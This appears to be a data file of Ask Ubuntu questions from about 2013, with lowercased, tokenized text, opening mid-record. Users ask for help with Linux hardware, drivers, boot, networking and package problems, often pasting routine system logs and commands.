06:38:47 joost-hp-compaq-nc6320 kernel : [ 8970.729949 ] udf-fs : error ( device sr0 ) : udf_read_tagged : read failed , block=512 , location=512 aug 12 06:38:47 joost-hp-compaq-nc6320 kernel : [ 8970.729955 ] udf-fs : error ( device sr0 ) : udf_read_tagged : tag version 0x0000 ! = 0x0002 || 0x0003 , block 0 aug 12 06:38:47 joost-hp-compaq-nc6320 kernel : [ 8970.729960 ] udf-fs : error ( device sr0 ) : udf_read_tagged : tag version 0x0000 ! = 0x0002 || 0x0003 , block 0 aug 12 06:38:47 joost-hp-compaq-nc6320 kernel : [ 8970.729964 ] udf-fs : warning ( device sr0 ) : udf_load_vrs : no anchor found aug 12 06:38:47 joost-hp-compaq-nc6320 kernel : [ 8970.729968 ] udf-fs : warning ( device sr0 ) : udf_fill_super : no partition found ( 1 ) my issue seems a lot like : ca n't mount a not copy protected dvd video ? i just ran into this issue today . but it has been a long time since i played a dvd on my laptop , so perhaps old pre-raring issue . anyway , i need some help here , i 've been googling and trying for hours . many thanks in advance ! my system info : • ubuntu 13.04 • gnome ( 3.6.3 2013-03-18 ) • fallback no effects • kernel : 3.8.0-28-generic # 41-ubuntu smp fri jul 26 16:28:49 utc 2013 i686 i686 i686 gnu/linux • pc model : hp compaq 6320 laptop • cpu : dual 1.83 intel centrino • memory : 4gb ( of which ubuntu can only use 3.2gb ) • hard drive : 160gb hdd • dvd drive : hl-dt-st dvdram gsa-t10n ( perhaps relevant ? )
331534	resume a process via a pid number	i wanted a daemon to start on boot so i added a line to /etc/rc.local that ended in `` & '' i did that so it would run in the background . the daemon is loaded and working fine but when the daemon is running you can press keys that do other important things . when i am finally logged in i wanted to resume process or send it a terminal ( tty2 ) so i can do a couple of things . i 'm new to linux and not sure how to do this . i do a ps -aux |grep uox to work out which pid it is . but not sure how to resume .
331535	restore 'cd .. ' functionality after following a symbolic link	if i create a symbolic link in the terminal with a command like ln -s /path/to/some/directory symboliclink and then follow the link with cd symboliclink the terminal appears to think that the cwd is ~/symboliclink/ even though it is actually showing ~/path/to/some/directory/ ( assuming that the link was made in ~ , of course ) . what this means is that if i then type cd .. i am taken back to ~ , because the terminal 'thinks ' this is the parent of the cwd . what would i need to change such that cd .. would instead take me to ~/path/to/some/ , i.e . the real parent of ~/path/to/some/directory/ ?
331538	what is the right way to downgrade kernel	i decide to downgrade kernel version due to unsolvable problem with wifi . ubuntu version is 12.10 , kernel version is 3.5 . in http : //packages.ubuntu.com/precise/kernel/ i found the previous kernel version 3.2 . i decided to install linux-image-3.2.0-51-generic . the question is it enough to install just linux-image package , do i need to install linux-header package too , are there more package i should install ? the second question , as it suggested on the website , the right way to install the packages is to edit the file /etc/apt/sources.list insert the line deb http : //security.ubuntu.com/ubuntu precise-security main . however after inserting and running the update i still can not find packages of linux-image 3.2 by apt-cache search linux-images* . where i am wrong ?
331541	painfully slow booting from usb	i installed onto a usb ( not live ) and everything is painfully slow . i checked the usb and it seems to have a 10mb write speed on windows ( although the stick is ext4 , no swap ) . i 'm wondering does it think it 's usb1 ? is there a boot flag to try to put more the browser and other things into memory ( it does n't seem to be using much of it ) ? i 'll add that its actually debian with kde but i think the same problem/solution would apply
331547	issue with r8711 wi-fi usb after wake up from sleep	i have issue with restore from sleep mode on ubuntu 13.04 linux 3.8.0-28-generic # 41-ubuntu smp [ 25944.029996 ] video lnxvideo:00 : restoring backlight state [ 25944.304744 ] ipv6 : addrconf ( netdev_up ) : wlan3 : link is not ready [ 25944.418469 ] r8169 0000:02:00.0 eth1 : link down [ 25944.418552 ] ipv6 : addrconf ( netdev_up ) : eth1 : link is not ready [ 25944.439853 ] r8712u : in r8711_wx_set_scan : bdriverstopped=1 [ 25944.439975 ] r8712u : in r8711_wx_set_scan : bdriverstopped=1 [ 25945.580319 ] [ drm ] enabling rc6 states : rc6 on , rc6p off , rc6pp off [ 25967.754316 ] r8712u : in r8711_wx_set_scan : bdriverstopped=1 [ 25981.900796 ] ipv6 : addrconf ( netdev_up ) : wlan3 : link is not ready [ 25981.922257 ] r8712u : in r8711_wx_set_scan : bdriverstopped=1 [ 25981.922378 ] r8712u : in r8711_wx_set_scan : bdriverstopped=1 [ 26004.746640 ] r8712u : in r8711_wx_set_scan : bdriverstopped=1 but if i do those commands $ sudo modprobe r8712u $ sudo modprobe r8712u o just reconnect usb-dongle , wifi begin works . it 's inconvenient . seems like a but for me . any suggestions ? on fresh installed netrunner ( based on that version ubuntu ) no that issue at all . seems for me that update from ubuntu lts went wrong somewhere .
331550	why networkmanager use a biased route when i import the vpn configuration ?	i 'm trying to play around with virtual machines . i 've set up a network of vms accessible via nat gateway ( a vm too ) and openvpn . everything works fine in windows 7 . but in ubuntu 13.04 it only works when i use the terminal ( with sudo of course ) to connect to the server . here is the real problem : when i import the configuration file to the network manager it connects to the vpn gateway but no traffic . i found that the reason of that is a route that gnome network manager adds in the route table . it is : 192.168.56.101 my.wifi.router 255.255.255.255 ugh 0 0 0 wlan0 mainly nm is routing all traffic going to 192.168.56.1 which is my virtual router ( using host only mode ) to the wifi interface , after i deleted this route all works fine . now come the question , why is the network manager adding this route ? ?
331551	some keys act as a arrows or type numbers	i do n't know what i did but now some keys from the keyboard are not typing the corresponding letter but move the cursor instead . the expected letter is typed if i press the fn key at the same time . with the shift key pressed the funny keys type numbers . i 've read about a similar issue where the numlock key was activated . there is no numlock on this keyboard . i 've installed numlockx and run 'numlockx off ' : no change ! with 'numlockx on ' : the funny keys type numbers . i 've tried rebooting off course : nope ... here an image of the keyboard :
331552	juju ca n't connect to environment	i have been trying to run juju status -e maas but it keeps giving me the error 2013-08-12 10:00:48,301 info connecting to environment ... 2013-08-12 10:00:48,357 error can not connect to environment : unexpected http 401 trying to get http : //10.168.71.151/maas/api/1.0/files/ ? filename=provider-state & op=get and it goes on down ... i am currently following the tutorial for ubuntucloudinfrastructure , done everything till the above commands .
331557	ubuntu support to backup plus 1tb external hard drive	i have installed ubuntu 12.04 on my desktop .as my internal storage is very less ( 80gb ) , i am planning to by seagate backup plus 1 tb external hard disk for use . will ubuntu will support to this exterbal drive to use ? is there anything i need to do affter connecting to my desktop ? my system specs are : processor : intel core 2 duo , 1.5 gb ram ddr2 , ubuntu 12.04 os . thanks , satish
331558	using a router plugged in to ubuntu pc to connect wirelessly to another modem/router	please how do i use my router to connect to another modem wirelessly so that i can use the internet . my pc has a weak connection but i have a spare router that has a good wireless capability , i want to use it like a virtual router to access the modem upstairs so i can go online .
331561	laptop does not actually turn off on shutdown	i have a laptop with lubuntu 13.04 when given the shut down command , it exits the graphical interface , shows the lubuntu logo and then the screen goes black , but the computer never actually goes off until i press and hold the power button . is it possible to fix ?
331569	ubuntu 12.10 freezes after going to suspend	after a very long time that i suffer from this problem , i have decided to `` ask ubuntu '' . i know there is quite a bit of information about this problem , but none had worked for me so far . the symptoms : when pressing suspend in ubuntu , ( every once in a while ) the screen turns black and after a few seconds the fans start to work rapidly ( apparently due to cpu usage ) . i had this problem both in ubuntu 12.04 and in 12.10 ( after i upgraded ) . many solutions have been suggested for this issue , but none seems to work for me . for example , there 's this post : entire system freezing after pressing âsuspendâ [ closed ] clues for the cause of this problem , and what i have found out : first of all i should mention that i have an amd radeon hd 6470m gpu and have the amd drivers installed ( i do not use the proprietary drivers , because they do n't handle the gpu as well as the amd drivers ) . it is probable that this is the key for this issue . i have found a suggestion somewhere ( but i ca n't find the link to the forum now ) , that ubuntu should be sent to sleep using the shell commands : dbus-send -- system -- print-reply -- dest= '' org.freedesktop.upower '' /org/freedesktop/upower org.freedesktop.upower.suspend i ca n't remember if this requires for an installation of some package or not . anyway , this seemed to work for me at the beginning , but shortly after i started using this command the problem returned . then i had an idea : it seemed to me that the problem appears because of the use of the amd drivers and that when going to suspend the cpu is stuck in some infinite loop , so i have decided to monitor my processes and send the computer to sleep ( using the script ) only after the `` compiz '' process is not using the cpu ( monitoring with `` system monitor '' ) . this may seem to be an odd idea , but it seems to work almost completely . nowadays , i send ubuntu to suspend using the above script when i see that all processes are idle ( there 's no cpu usage ) , and it works without any problem almost every time . unfortunately , every other time ubuntu freezes as before . but these occurrences are more rare then they used to be . update ( as of oct. 26th , 2013 ) - a ( flimsy ) solution : after some more tests , it seems that the following method works : open the `` system monitor '' and choose the `` processes '' tab . make sure to choose the option view- > all processes . before dispatching a suspend request , wait for the processes `` compiz '' and `` xorg '' to reach idle use of the cpu . request a suspend using the commands ( in the terminal ) : dbus-send -- system -- print-reply -- dest= '' org.freedesktop.upower '' /org/freedesktop/upower org.freedesktop.upower.suspend ( using the ubuntu `` suspend '' shortcut may work as well . i havent tested it yet ) . obviously , this is n't an ideal solution , but it gets the job done . this is the most i can do with my knowledge of linux . so , the call for help is still on . if anybody have any idea how to finally solve this problem , or further debugging it , any help will be appreciated .
331570	plymouth manager not opening	i installed plymouth manager . initially it was working fine . but , by mistake i click on the 'burg compatibility ' button' now whenever i click on plymouth manager in unity , its not opening and only animate the icon background color for some time . now , i am unable to install or set other boot splash theme , as the manager is not opening . please suggest me how can i reset it back to default , or how can i disable 'burg compatibility ' .
331573	grub menu not appearing	i have a laptop with windows xp installed . i installed ubuntu 13 as a dual boot and everthing appeared okay later on i booted with windows and since then the grub menu is never displayed when the machine is booted . if i use a usb to boot ubuntu i can see the various linux and windows partitions what should i do ? richard
331577	is it possible to avoid the question at softwarechoice during installation ?	i remastered your lubuntu-alternate-iso , added own packages an a new preseed-file which works fine and is exactly what i was searching for . there is one problem left , where i found no help using google : is it possible to avoid the question at softwarechoice ( openssh-server , lubuntu-desktop , etc . ) perhaps in preseed and just install lubuntu-minimal without any further question ? or is there any other way to solve this problem ? thanks for your help edit : sorry , but now i saw , that lubuntu-minimal is installing a desktop . is it possible to install a text-base-lubuntu-alternate without x ?
331578	my laptop wireless cuts on other machines in the network . what may cause this problem ?	why when every time i connect to internet by wireless in the network , all other machines in the network lose connection . i do n't know how this happens . i am using ubuntu 12.04 lts . any help please ?
331581	my speakers on dell inspiron n5110 stopped working	i have dell inspiron n5110 , core i5 , my speakers were working fine after installing ubuntu , somehow 3 days back it started crackling and now stopped working completely , my headphone is working properly . i 'm new in ubuntu . i entered pulseaudio and this came : e : [ pulseaudio ] pid.c : daemon already running . e : [ pulseaudio ] main.c : pa_pid_file_create ( ) failed . i also tried to test here it came : problemtype : bug distrorelease : ubuntu 12.04 package : alsa-base 1.0.25+dfsg-0ubuntu1.1 procversionsignature : ubuntu 3.5.0-36.57~precise1-generic 3.5.7.14 uname : linux 3.5.0-36-generic x86_64 alsaversion : advanced linux sound architecture driver version 1.0.25 . apportversion : 2.0.1-0ubuntu17.3 architecture : amd64 arecorddevices : **** list of capture hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : stac92xx analog [ stac92xx analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 audiodevicesinuse : user pid access command /dev/snd/controlc1 : golinaz 2941 f ... . pulseaudio /dev/snd/controlc0 : golinaz 2941 f ... . pulseaudio /dev/snd/pcmc0d0p : golinaz 2941 f ... m pulseaudio card0.amixer.info : card hw:0 'pch'/'hda intel pch at 0xf7b00000 irq 54' mixer name : 'idt 92hd87b1/3' components : 'hda:111d76d1,102804b0,00100205' controls : 18 simple ctrls : 10 card1.amixer.info : card hw:1 'nvidia'/'hda nvidia at 0xf6080000 irq 17' mixer name : 'nvidia gpu 14 hdmi/dp' components : 'hda:10de0014,10de0101,00100100' controls : 24 simple ctrls : 4 date : sun aug 11 18:46:27 2013 installationmedia : ubuntu 12.04.2 lts `` precise pangolin '' - release amd64 ( 20130213 ) markforupload : true packagearchitecture : all procenviron : term=xterm path= ( custom , no user ) lang=en_us.utf-8 shell=/bin/bash sourcepackage : alsa-driver symptom : audio symptom_card : built-in audio - hda intel pch symptom_jack : speaker , internal symptom_type : sound works for a while , then breaks title : [ inspiron n5110 , idt 92hd87b1/3 , speaker , internal ] fails after a while upgradestatus : no upgrade log present ( probably fresh install ) dmi.bios.date : 03/22/2012 dmi.bios.vendor : dell inc. dmi.bios.version : a10 dmi.board.name : 0fxk2y dmi.board.vendor : dell inc. dmi.board.version : a10 dmi.chassis.type : 8 dmi.chassis.vendor : dell inc. dmi.chassis.version : not specified dmi.modalias : dmi : bvndellinc. : bvra10 : bd03/22/2012 : svndellinc. : pninspironn5110 : pvrnotspecified : rvndellinc. : rn0fxk2y : rvra10 : cvndellinc . : ct8 : cvrnotspecified : dmi.product.name : inspiron n5110 dmi.product.version : not specified dmi.sys.vendor : dell inc. mtime.conffile..etc.modprobe.d.alsa.base.conf : 2013-08-10t21:26:07.867028 help me please !
331582	how to use a t420 with two external displays ?	using an ubuntu 12.04.2 lts on a notebook on the table there are two displays ( lenovo l2240p ) connected to a thinkpad t420 : left display : connected with dvi . right display : connected with vga . they look like this when all is connected : user @ notebook : ~ $ xrandr -q screen 0 : minimum 320 x 200 , current 3280 x 1050 , maximum 8192 x 8192 lvds1 connected 1600x900+0+69 ( normal left inverted right x axis y axis ) 310mm x 174mm 1600x900 60.0*+ 1440x900 59.9 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 1680x1050+1600+0 ( normal left inverted right x axis y axis ) 473mm x 296mm 1680x1050 60.0*+ 74.9 1600x1000 60.0 1280x1024 75.0 60.0 1440x900 75.0 59.9 1152x864 75.0 1024x768 75.1 70.1 60.0 800x600 72.2 75.0 60.3 640x480 72.8 75.0 66.0 60.0 720x400 70.1 lspci : user @ notebook : ~ $ lspci -v ... 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : lenovo device 21d0 flags : bus master , fast devsel , latency 0 , irq 44 memory at f0000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 5000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915 ... purpose : we do n't need the screen of the notebook , only the screen on the two monitors ( not in clone mode ! ) q : how can we do this ?
331593	is there any difference between dual boot ubuntu and and windows system and a stand alone ubuntu system ?	i have a dual boot windows 7 and ubuntu 13.04 system ( not wubi ) and i wanted to know is there any difference when we install ubuntu by erasing whole hard disk ( stand alone ) and when we dual boot it by giving it available free space .
331594	on configuration of serial ports on wine	i have wine 1.6 on ubuntu 12.04 and i have tried to get pinreader.exe on http : //www.eobd2.com/upload/pro/renault-pin-reader-v312.rar to detect serial ports ( com1 ) automatically . i have created symbolic link com1 to /dev/ttys0 in ~/.wine/dosdevices and written mode= '' 0666 '' to 50-udev-default.rules in /etc/udev/rules.d/ . it changes the mode on next boot . the program opens an error window with the text `` error : com ports not found ! '' . i have added user defined serial port to wine registry using wine regedit according to http : //www.downtowndougbrown.com/2013/03/getting-x-ctu-in-wine-to-detect-your-serial-ports/ . i get an error message wine : call from 0x7b83bbd5 to unimplemented function cfgmgr32.dll.cm_open_devnode_key on terminal . the actual program opened an error window with the text `` external exception 0x80000100. '' . the next step was to override cfgmgr32.dll by the native one . however , the program again opens an error window with the text `` error : com ports not found ! '' . what to do next ?
331600	which version do i need to download ?	i 'm currently running a windows 7 computer , but it says i have a 64-bit os , and i 'm confused as to whether or not i need to download the 32-bit version of ubuntu , or the 64-bit , since it says to download the 64-bit version if i have a windows 8 logo .
331603	screencast-o-matic keyboard shortcuts - i ca n't get them to work	i switched to ubuntu a few months ago and i have not yet been able to understand why screencast-o-matic keyboard shortcuts do n't work . apparently they should work on ubuntu in the same way as on windows , but they do n't at least for me . i am on 13.04 and everything runs great . when i try the alt+p shortcut nothing happens . any help would be greatly appreciated . thank you very much ! $ java -version java version `` 1.7.0_25 '' java ( tm ) se runtime environment ( build 1.7.0_25-b15 ) java hotspot ( tm ) 64-bit server vm ( build 23.25-b01 , mixed mode ) i had the openjdk and it did not work so i thought of trying oracle , still no go . i noticed that when i select the som recorder window the unity menu panel on top left says `` firefox '' perhaps this has to do with the issue ?
331605	simulate right-click in laptop .	in my laptop the right-click button is not working . is there any way ( like a long left-click ) which can simulate a right-click . also my laptop do n't have a number-pad . so i ca n't use mouse-keys settings of ubuntu .
331607	simple rsync incremental backup that timestamps deleted files	i use rsync as follows : rsync -a -- backup -- suffix= '' . `` $ ( date + '' % y % m % d % h % m '' ) source backups to dump the whole of folder source into the folder backups , with the additional feature that if i modify some file foo in source , the old version of foo in backups will be renamed with a date suffix before the new foo is copied into backups . this simple procedure does the job for me , only that i would like a deleted file to be renamed with the date suffix instead of being removed from backups . that is , if foo is deleted from source , then rename foo in backups with the date suffix . i have tried to achieve this but so far no success . any ideas ?
331608	installing postgres removes rabbitmq and vice versa . how to make both stay ?	i need both rabbitmq-server and postgresql to be installed on my machine and apt-get installing one removes the other . here is the output from install commands : $ sudo apt-get install postgresql reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : erlang-asn1 erlang-base erlang-corba erlang-crypto erlang-diameter erlang-edoc erlang-eldap erlang-erl-docgen erlang-eunit erlang- ic erlang-inets erlang-inviso erlang-mnesia erlang-nox erlang-odbc erlang-os-mon erlang-parsetools erlang-percept erlang-public-key erlang-runtime-tools erlang-snmp erlang-ssh erlang-ssl erlang-syntax-tools erlang-tools erlang-webtool erlang-xmerl libkrb5-dev libodbc1 libossp-uuid16 libsctp1 lksctp-tools postgresql-client-9.1 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : postgresql-9.2 postgresql-common suggested packages : oidentd ident-server locales-all the following packages will be removed : logrotate rabbitmq-server the following new packages will be installed : postgresql postgresql-9.2 postgresql-common 0 upgraded , 3 newly installed , 2 to remove and 1 not upgraded . need to get 0 b/3,971 kb of archives . after this operation , 13.8 mb of additional disk space will be used . and upon trying to install rabbitmq-server after installing postgres : $ sudo apt-get install rabbitmq-server reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libkrb5-dev libossp-uuid16 postgresql-client-9.1 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : logrotate suggested packages : mailx the following packages will be removed : postgresql postgresql-9.1 postgresql-9.2 postgresql-9.2-repmgr postgresql-9.2-slony1-2 postgresql-common postgresql-contrib-9.2 postgresql-plpython-9.2 postgresql-server-dev-9.2 the following new packages will be installed : logrotate rabbitmq-server 0 upgraded , 2 newly installed , 9 to remove and 1 not upgraded . need to get 3,753 kb/3,795 kb of archives . after this operation , 37.6 mb disk space will be freed . do you want to continue [ y/n ] ? get:1 http : //in.archive.ubuntu.com/ubuntu/ raring/main rabbitmq-server all 3.0.2-1 [ 3,753 kb ] fetched 3,524 kb in 19s ( 177 kb/s ) ( reading database ... 337129 files and directories currently installed . ) removing postgresql ... removing postgresql-9.1 ... * stopping postgresql 9.1 database server [ ok ] removing postgresql-plpython-9.2 ... removing postgresql-contrib-9.2 ... update-alternatives : warning : forcing reinstallation of alternative /usr/share/postgresql/9.2/man/man1/postmaster.1.gz because link group postmaster.1.gz is broken removing postgresql-9.2-slony1-2 ... removing postgresql-9.2-repmgr ... removing postgresql-9.2 ... * stopping postgresql 9.2 database server [ ok ] removing postgresql-server-dev-9.2 ... removing postgresql-common ... removing 'diversion of /usr/bin/pg_config to /usr/bin/pg_config.libpq-dev by postgresql-common' processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot processing triggers for man-db ... selecting previously unselected package logrotate . ( reading database ... 335927 files and directories currently installed . ) unpacking logrotate ( from ... /logrotate_3.8.3-3ubuntu2_amd64.deb ) ... selecting previously unselected package rabbitmq-server . unpacking rabbitmq-server ( from ... /rabbitmq-server_3.0.2-1_all.deb ) ... processing triggers for man-db ... processing triggers for ureadahead ... setting up logrotate ( 3.8.3-3ubuntu2 ) ... setting up rabbitmq-server ( 3.0.2-1 ) ... * starting message broker rabbitmq-server my django app is supposed to use postgres as the db and rabbitmq for celery ... and they both are behaving like envious girlfriends . update : apt-cache policy # apt-cache policy package files : 100 /var/lib/dpkg/status release a=now 500 http : //apt.postgresql.org/pub/repos/apt/ precise-pgdg/main amd64 packages release o=apt.postgresql.org , a=precise-pgdg , n=precise-pgdg , l=postgresql for debian/ubuntu repository , c=main origin apt.postgresql.org 500 http : //security.ubuntu.com/ubuntu/ raring-security/main translation-en 500 http : //security.ubuntu.com/ubuntu/ raring-security/main amd64 packages release v=13.04 , o=ubuntu , a=raring-security , n=raring , l=ubuntu , c=main origin security.ubuntu.com 500 http : //archive.ubuntu.com/ubuntu/ raring-updates/universe translation-en 500 http : //archive.ubuntu.com/ubuntu/ raring-updates/main translation-en 500 http : //archive.ubuntu.com/ubuntu/ raring-updates/universe amd64 packages release v=13.04 , o=ubuntu , a=raring-updates , n=raring , l=ubuntu , c=universe origin archive.ubuntu.com 500 http : //archive.ubuntu.com/ubuntu/ raring-updates/main amd64 packages release v=13.04 , o=ubuntu , a=raring-updates , n=raring , l=ubuntu , c=main origin archive.ubuntu.com 500 http : //archive.ubuntu.com/ubuntu/ raring/universe translation-en 500 http : //archive.ubuntu.com/ubuntu/ raring/main translation-en 500 http : //archive.ubuntu.com/ubuntu/ raring/universe amd64 packages release v=13.04 , o=ubuntu , a=raring , n=raring , l=ubuntu , c=universe origin archive.ubuntu.com 500 http : //archive.ubuntu.com/ubuntu/ raring/main amd64 packages release v=13.04 , o=ubuntu , a=raring , n=raring , l=ubuntu , c=main origin archive.ubuntu.com pinned packages : apt-cache show rabbitmq-server : # apt-cache show rabbitmq-server package : rabbitmq-server priority : extra section : net installed-size : 4356 maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > original-maintainer : rabbitmq team < packaging @ rabbitmq.com > architecture : all version : 3.0.2-1 depends : erlang-nox ( > = 1:12.b.3 ) , adduser , logrotate filename : pool/main/r/rabbitmq-server/rabbitmq-server_3.0.2-1_all.deb size : 3753308 md5sum : f89d5b663d67af38ea8f7948fc9ab61a sha1 : 30b7b865c42cd279e1194839d69fd522dc0ae12b sha256 : 981da016a32255f051fe43d5c6c8ed406b4f22cc8ac7c9dad01690bf42ea1959 description-en : amqp server written in erlang rabbitmq is an implementation of amqp , the emerging standard for high performance enterprise messaging . the rabbitmq server is a robust and scalable implementation of an amqp broker . homepage : http : //www.rabbitmq.com/ description-md5 : 78e91bfb996ee4ae5d16c93298f5f6e8 bugs : https : //bugs.launchpad.net/ubuntu/+filebug origin : ubuntu supported : 9m
331609	facebook chat not working with empathy in ubuntu 12.04	i am using ubuntu 12.04 , and been trying to connect to facebook chat using empathy . but the connection is not getting successful , and it is showing `` disconnected - network error '' . the parameters i entered is the following : protocol : jabber jabber id : someone.someone @ chat.facebook.com ( the facebook username being www.facebook.com/someone.someone ) jabber password : something ( my facebook password ) encryption required : tls/ssl server : chat.facebook.com port : 5222 how to resolve the issue ? please help .
331611	my comouter steels networks !	i used to connect to wifi networks and it was going well , but now every time i try to connect i connect ok , but i kill the network connections on my other machine ! how did this happen ? i have already tried the following solution . can anyone help ? the solution was to open up the file /etc/modprobe.d/blacklist.conf and add blacklist bcm43xxblacklist b43 blacklist b43legacy blacklist bcma blacklist ndiswrapper blacklist wl next , open up the file /etc/modules and add the following at the end of the file : brcmsmac alternatively , you can type sudo sh -c `` echo 'brcmsmac ' > > /etc/modules '' in a terminal to do this all at once . finally reboot the machine . now , what caused this bug ?
331621	somehow , i 've stoped opengl working	somehow , i can no longer run anything that uses opengl . any attempts to do so get the error xlib : extension `` glx '' missing on display `` :0 '' .. in /usr/lib i have libgl.la , libgl.so , libgl.so.1 and libgl.so.325.15 ( to which libgl.so and libgl.so.1 symlink ) . can anyone figure out why it would n't be working ?
331625	kubuntu : no display configuration tool after upgrade from 12.10	after upgrading kubuntu from 12.10 to 13.04 there 's no display configuration tool . i 've installed kscreen package which was n't selected during upgrade , but without any success . i 've dual screen setup , the configuration dialog for display is now empty .
331626	how to add keyboard shortcuts ?	i want ctrl+alt+b bring up a browser . ctrl+alt+delete is handy . can i set up ctrl+alt+b to bring up a browser ( either default or specific ) ?
331628	fresh install of 12.04 on hp 6570b with ati radeon 7500m is not usable for newbies	i 'm setting up a brand new hp probook 6570b with an integrated ati 7500m video card . after starting the ubuntu 12.04 64 bit live installer the desktop comes up well in a few seconds and all seems fine . installation is quick and smooth . after the first reboot the first bad surprise . screen is almost deep purple , no login is possible , even ctrl-alt-f1 is not working at all . rebooting and neither the grub boot menu is visibile ! aaargh ... . so i restarted from usb with the installer to do some rescue , and after commenting out these damned 2 lines in /etc/default/grub : # grub_hidden_timeout=0 # grub_hidden_timeout_quiet=true and rebooting , now grub boot menu is ok , but after the reboot the screen is badly split ( screenshot here : https : //www.dropbox.com/sc/zy02pij9lrzaqmj/yq0hwytmhs ) . tried to install fglrx driver from the precise repository but it is using a too old driver which is not aware of this chipset model . then tried to use the latest amd catalyst driver ( version 13.4 ) using the best guide around ( http : //wiki.cchtml.com/index.php/ubuntu_precise_installation_guide ) and now i finally got a working ubuntu 12.04 . i state that i 'm working with linux since almost 20 years and that i 'm an ubuntu big fan , it 's a pity imvho that if a newbie will try ubuntu on this laptop will have a really negative experience . i 've the following questions : why the live is working so well with the open source driver , but at reboot it will not work at all ? the grub hidden menu gave me lot of hassle with several systems , why keep it enabled by default ? why the fglrx driver is so old in 12.04 , being an lts release ? hoping to be helpful to someone who will use ubuntu 12.04 on this laptop model . quick update : using dual monitor configuration with a virtual of 3200x900 will not work since x will segfault . the workaround that worked for me is the following : 1 . use the xorg-edgers ppa to get updated xorg for 12.04 2 . use the raring 3.8 kernel : $ sudo apt-get linux-generic-lts-raring
331635	how do i install amd catalyst display driver on lubuntu 13.04 ( radeon hd4250 )	i 'm trying to install the drivers for my radeon hd 4250 graphics card on my lubuntu 13.04 station . i want to run multiple monitors ( 1 vga 1 hdmi ) but i am having overscan issues on the hdmi monitor . i attempted to install from the drivers list on the amd website but when i attempt to install the drive it says that i need to install one or more required tools before being able to install the driver . i have tried to run with -- force and i just end up having even crappier display . i attempted to install via the xorg-edgers repo but i still ca n't find a amd ccc driver in the additional drivers tab
331646	how can i access ubuntu from windows 8 ?	i 've dual booted my laptop with ubuntu-13.04 and windows 8 while i am in windows-8 , is there any way by which i can boot installed ubuntu in virtual machine , or any that kind of software ? i just do n't want to restart my pc to boot in ubuntu i do n't mean to access storage partition i just want to boot into ubuntu ( which is pre installed ) in windows-8
331656	no sound after playing around with pulseaudio	i was trying to be able to monitor my microphone input and i ran into this question . ( how to hear my voice in speakers with a mic ? ) i followed charl botha 's advice , and launched pulseaudio volume control , then typed into the terminal that i used to launch the application pactl load-module module-loopback latency_msec=1 after doing this , nothing happened except that now there is no sound at all ! i have checked all pulseaudio volume control settings and everything seems to be fine , yet there still is no sound . guest account has sound , but mine does not . any help would be much appreciated !
331661	ubuntu is taking way longer to load on faster computer than on slower computer . help ?	i 've recently installed ubuntu 12.04.2 on an old computer i 'm now using for a server . it worked great , and is much faster than windows , so i decided to dual boot it on my computer that i actually use . because my video card is nvidia and has optimus software on it , and refused to work at every solution i could find , it took me a while to get it working properly . as soon as i got it working , i noticed that my computer was taking longer to boot up to the login screen than it was taking on the server computer . my current computer is a dell inspiron 17r special edition laptop , which has 8gb gddr3 ram , 8 cores of roughly 3 ghz processor , a nvidia geforce gt 650m graphics card ... you get the point . it 's got the power , but it 's just taking longer . the server computer however , has only 4 gigs of ram , and a dual core 3 ghz processor , and integrated graphics . also , they 're both running on linux ubuntu 12.04.2 64 bit . i 'll let you decide which is supposed to be faster ... server computer boots to login screen in well under 20 seconds . main computer takes well over the time to login on the server one and pull up mozilla , and start the server . the output of dmesg is available here : http : //paste.ubuntu.com/5977206/
331663	ca n't print normal page size	ubuntu 12.04 . when i print it cuts off about an inch at the bottom . is there someway to change the print page size ?
331664	how can i remove bittorrent from ubuntu ?	hi i went to download opensuse from distrowatch and selected the bit torrent download . the download distro appeared in `` my downloads '' within seconds . it usually take 3 hours for a distro to download on my system . however about an hour later i could not get it to burn to dvd disk . there also appears to be two parts to it which i have not experienced before . previously all my d/l had only one file . i am also worried about my security due to the p2p aspect , and i do n't like not being able to see the download in progress . is there anyway i can remove this application from ubuntu ? if not , how safe is it to leave it installed ? can i stop it taking over so that i can download distros as i used to ?
331667	no wireless for intel corporation 7260 version 63	i have a dell xps 12 running ubuntu 13.10 and it does n't appear to find it 's wireless . i have tried the suggestions here but they made no difference peter @ xps : /lib/firmware $ ls -l /lib/firmware/iwlwifi-7260-7.ucode -rw-r -- r -- 1 root root 682892 aug 4 12:50 /lib/firmware/iwlwifi-7260-7.ucode peter @ xps : /lib/firmware $ sudo lshw -c network *-network unclaimed description : network controller product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:06:00.0 version : 63 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress cap_list configuration : latency=0 resources : memory : f7c00000-f7c01fff peter @ xps : ~/backports-3.10-2 $ grep iwl7260_ucode_api_max drivers/net/wireless/iwlwifi/iwl-7000.c # define iwl7260_ucode_api_max 7 .ucode_api_max = iwl7260_ucode_api_max , \ peter @ xps : ~/backports-3.10-2 $ dmesg | grep iwl peter @ xps : ~/backports-3.10-2 $ iwconfig lo no wireless extensions . peter @ xps : ~ $ find / -name *7260-6* peter @ xps : ~ $ find / -name *7260-7* /lib/firmware/iwlwifi-7260-7.ucode peter @ xps : ~ $ dmesg | grep -i -a 20 intel [ 1318.013278 ] intel ( r ) wireless wifi driver for linux , in-tree : d [ 1318.013281 ] copyright ( c ) 2003-2013 intel corporation [ 1318.015154 ] cfg80211 : world regulatory domain updated : [ 1318.015157 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1318.015159 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) 